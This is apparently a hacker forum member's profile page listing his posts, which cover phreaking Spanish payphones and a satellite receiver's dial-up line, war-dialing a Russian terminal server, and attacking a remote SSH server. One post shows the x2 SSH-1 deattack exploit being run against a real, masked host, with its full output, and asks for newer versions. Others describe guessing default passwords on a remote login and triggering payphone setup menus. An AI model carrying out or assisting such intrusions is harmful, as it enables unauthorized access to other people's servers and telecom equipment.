Reaper45

Members
  • Content count

    23
  • Joined

  • Last visited

Community Reputation

0 Neutral

About Reaper45

  • Rank
    SCRiPT KiDDie
  1. So I was wondering what my tv sat receiver does when I buy a pay per view movie. It first dials a number with his own modem, which I guessed using dtmf decoder software.. After dialing that number with my PC, Hyperterminal shows me a login screen. Later I hex edited a firmware dump of the receiver and found the username and password it uses to connect, and checked them later. They are valid, but after the login screen, apparently nothing happens next. I tried making a new internet connection with that number and login info, but the connection fails. I think it's because I'm not using the correct protocol... Any ideas on how should I continue? Thanks in advance.
  2. Yeah, but the automated lady says that the number is not in use. It's still amazing that you did this by ear. P.D.: It's the first time I see a forum reply with a disclaimer xD Nice.
  3. You might not have realized yet that the last one was recorded at night and that I did it directly from the payphone's speaker. Anyway, I appreciate a lot your interest in helping me guys. Here's what I realized: The 10th digit that some of you are hearing is indeed a ringback tone. I am able to hear it clearly after forcing the payphone to dial the number. I wonder why it connects so fast. I am also a 99% sure that there are only 9 digits as it is the standard here in Spain. I also have read that the number is different in every state, so the first an the second digit could be "9" and "2", as those are the ones that belong to my city. I'll keep trying to get better recordings, this time with some other hardware.
  4. Oh, I do not. Megaupload always gives me my daily ration of warez xD. I posted a rar just because they were a lot of files. Anyway, finally I was able to get a good recording. Now the software DTMF decoders analyze some tones, even if they are wrong. Here it goes. 15.wav
  5. My very first hack? Well, when I was around 5-6 years old, my father buyed an old 386. Soon my sister installed a pirated version of Prehistorik, and my father used to enter the commands to start the game for me. One day he wasn't there and I tried to do it by myself, but I was scared because my mother told me that if I touched the computer it could broke. So I stayed 30 minutes trying to figure how to use the command dir and how to run executables In the end, the solution to the problem was something like this: c:\>dir [...] c:\>cd prehisto c:\prehisto>dir [...] c:\prehisto>unprehst.com [a crack in RAM memory] Programa instalado correctamente. Fuck you Eric Zmiro!! c:\prehisto>prehisto.exe [the game] Years later, I realized that I had fun doing this too xD. After that, I was curious so I typed c:\prehisto>edit prehisto.exe and I was amazed because it gave me the message "Best protection by Eric Zmiro". This was impressive to me, and then I realized what the "unprehst.com" program was for. P.S.: I still use "dir" instead of "ls" in linux xD.
  6. OK, thanks for the help. I have more recordings, but this one was the best I got. They were made with my Nokia phone (sorry for that ). Next time I'll try recording it at night. By the way, I know for sure that it is a nine digit number. After searching a bit I found a doc that says that there is a number for every state. So we could guess from this that the first one is number 9, and the second is possibly number 2. That is the area code of my state. Also, the paper says that I need a v.23 modem to connect to the number or the payphone... Wikipedia says that I can put my modem in v.23 mode by changing the S37 register (http://en.wikipedia.org/wiki/Hayes_command_set). I tried it with the payphone number but I got a "no carrier" answer. In speed autodetect mode (0), at least I was able to get garbage in the terminal. Payphones here react strangely. If you dial the number, the payphone answers automatically after a tone, and you can hear the noise of the street and the people talking (!!) and a few seconds later, the line is silent and the carrier answers. The board doesn't allow me to upload any .amr or .rar files, so you'll have to deal with mega. (Hint! Sayonara to captcha and hidden links. xD) http://www.megaupload.com/?d=DP73BG50
  7. I'm trying to decode the DTMF tones of a number from a recording I just made. The problem is that there is too much noise from cars and the wind, and it doesn't seem that I will be able to remove it easily. I tried to reduce the noise with adobe audition, but I'm not very good with it. Do you guys want to give a try? The recording is from a payphone in Spain. The payphone automatically dials it when a hack attempt to the setup menu is made (enter *23# and input an incorrect password 3 times). Although the micro goes out, the payphone does not turn off the speaker after that, so I was able to catch it. Soon I'll write a good article on hacking Telefonica payphones http://www.megaupload.com/es/?d=8ZPFGSB0
  8. Tcptrace can get past firewalls that block traceroute. Paratrace from Dan Kaminsky also works well, but in a different way.
  9. I'm sure there are another holes in this host, but I'm curious since I never hacked through a front door like SSH, and this is the perfect chance. It looks like a default installation. Xprobe2 says that the host is running linux kernel 2.2.X. So I telneted to port 22 and... fake@fake-desktop:~$ telnet xxx.xxx.xxx.xxx 22 Trying xxx.xxx.xxx.xxx... Connected to xxx.xxx.xxx.xxx. Escape character is '^]'. SSH-1.5-1.2.25 Protocol mismatch. Connection closed by foreign host. Incredible right? So I ran to milw0rm and downloaded x2.tgz, an exploit made by some guy from team teso, which seems to have dissapeared already. I choose target 42 as it seems to be the right one in the targets.txt file. fake@fake-desktop:~/$ ./x2 -t 42 xxx.xxx.xxx.xxx SSHD deattack exploit. By Dvorak with Code from teso (http://www.team-teso.net) Target: MNS quick - SSH-1.5-1.2.25 Attacking: xxx.xxx.xxx.xxx:22 Testing if remote sshd is vulnerable # ATTACH NOW YES # Finding h - buf distance (estimate) (1 ) testing 0x00000004 # SEGV # (2 ) testing 0x0000c804 # FOUND # Found buffer, determining exact diff Finding h - buf distance using the teso method (3 ) binary-search: h: 0x083fb7fc, slider: 0x00008000 # SURVIVED # (4 ) binary-search: h: 0x083ff7fc, slider: 0x00004000 # SEGV # (5 ) binary-search: h: 0x083fd7fc, slider: 0x00002000 # SURVIVED # (6 ) binary-search: h: 0x083fe7fc, slider: 0x00001000 # SEGV # (7 ) binary-search: h: 0x083fdffc, slider: 0x00000800 # SEGV # (8 ) binary-search: h: 0x083fdbfc, slider: 0x00000400 # SURVIVED # (9 ) binary-search: h: 0x083fddfc, slider: 0x00000200 # SURVIVED # (10) binary-search: h: 0x083fdefc, slider: 0x00000100 # SEGV # (11) binary-search: h: 0x083fde7c, slider: 0x00000080 # SURVIVED # (12) binary-search: h: 0x083fdebc, slider: 0x00000040 # SEGV # (13) binary-search: h: 0x083fde9c, slider: 0x00000020 # SURVIVED # (14) binary-search: h: 0x083fdeac, slider: 0x00000010 # SEGV # (15) binary-search: h: 0x083fdea4, slider: 0x00000008 # SURVIVED # Bin search done, testing result Finding exact h - buf distance (16) trying: 0x083fdea4 # SEGV # (17) trying: 0x083fdeac # SEGV # (18) trying: 0x083fdeb4 # SEGV # (19) trying: 0x083fdebc # SURVIVED # Exact match found at: 0x00002144 Looking for exact buffer address Finding exact buffer address (20) Trying: 0x08072144 # SEGV # (21) Trying: 0x08073144 # SEGV # (22) Trying: 0x08074144 # SEGV # (23) Trying: 0x08075144 # SEGV # (24) Trying: 0x08076144 # SEGV # (25) Trying: 0x08077144 # SEGV # (26) Trying: 0x08078144 # SEGV # (27) Trying: 0x08079144 # SEGV # (28) Trying: 0x0807a144 # SEGV # (29) Trying: 0x0807b144 # SEGV # (30) Trying: 0x0807c144 # SEGV # (31) Trying: 0x0807d144 # SEGV # (32) Trying: 0x0807e144 # SEGV # (33) Trying: 0x0807f144 # SEGV # (34) Trying: 0x08080144 # SEGV # (35) Trying: 0x08081144 # SEGV # (36) Trying: 0x08082144 # SEGV # (37) Trying: 0x08083144 # SEGV # (38) Trying: 0x08084144 # SEGV # (39) Trying: 0x08085144 # SEGV # (40) Trying: 0x08086144 # SEGV # (41) Trying: 0x08087144 # SEGV # (42) Trying: 0x08088144 # SEGV # (43) Trying: 0x08089144 # SEGV # (44) Trying: 0x0808a144 # SEGV # (45) Trying: 0x0808b144 # SEGV # (46) Trying: 0x0808c144 # SEGV # (47) Trying: 0x0808d144 # SEGV # (48) Trying: 0x0808e144 # SEGV # (49) Trying: 0x0808f144 # SEGV # (50) Trying: 0x08090144 # SEGV # (51) Trying: 0x08091144 # SEGV # (52) Trying: 0x08092144 # SEGV # (53) Trying: 0x08093144 # SEGV # (54) Trying: 0x08094144 # SEGV # (55) Trying: 0x08095144 # SEGV # (56) Trying: 0x08096144 # SEGV # (57) Trying: 0x08097144 # SEGV # (58) Trying: 0x08098144 # SEGV # (59) Trying: 0x08099144 # SEGV # (60) Trying: 0x0809a144 # SEGV # (61) Trying: 0x0809b144 # SEGV # (62) Trying: 0x0809c144 # SEGV # (63) Trying: 0x0809d144 # SEGV # (64) Trying: 0x0809e144 # SEGV # (65) Trying: 0x0809f144 # SEGV # (66) Trying: 0x080a0144 # From now on the exploit won't stop, it's quite clear it's vulnerable but it cannot find the buffer address in memory. So I wanted to ask you if you had any of the other versions of this exploit. I'm aware that x3.tgz and x4.tgz exists, but I was not able to find them.
  10. I remember I was messing around with at+ms= on modem 5:(?), but didn't managed to connect. Also... DN stands for atd + number right? Or am I missing something?
  11. Well... Not all bugs can be exploited remotely. I never tried to hack fotolog anyway.
  12. I did not understand a single word xD
  13. I was lucky guessing that the area code was 495. I'm surprised how fast the call was completed. Never called to Russia before The call went through my mobile phone by setting the terminal at 9600 baud. ate1 OK atd+7739-0241 NO CARRIER atd+007739-0241 NO CARRIER atd+7495739-0241 CONNECT 9600 Welcome to TeleCore Login: Mihail Password: Login incorrect Login: Full Access Password: Login incorrect Login: doro Password: Login incorrect NO CARRIER Here you see, I tried the default password of a Ascend Pipeline Terminal server (user: Full Access password: Ascend) and the usernames that finger gave me. But who knows, maybe I'm not dialing to the same node. Anyway, my wallet says it's not a good idea to try to crack the passwords. EDIT: More info. http://208.20.202.14/rte-ascend/1999/Nov/msg00038.html http://archives.real-time.com/rte-ascend/1...p/msg20286.html What's a PRI? If only we had a manual...
  14. That's not the problem. This is a classic case of client-side checks when they should be server-side. I knew that. It was just to point that if you manage to access the server you could easily get root by exploiting that apache version.
  15. 1) Write your text on the notepad. 2) Paste it on the photo comment box withouth pressing any other key. 3) Update! Found it the other day while uploading a photo. Well... Not surprised since I heard that they use ancestral versions of Apache server xD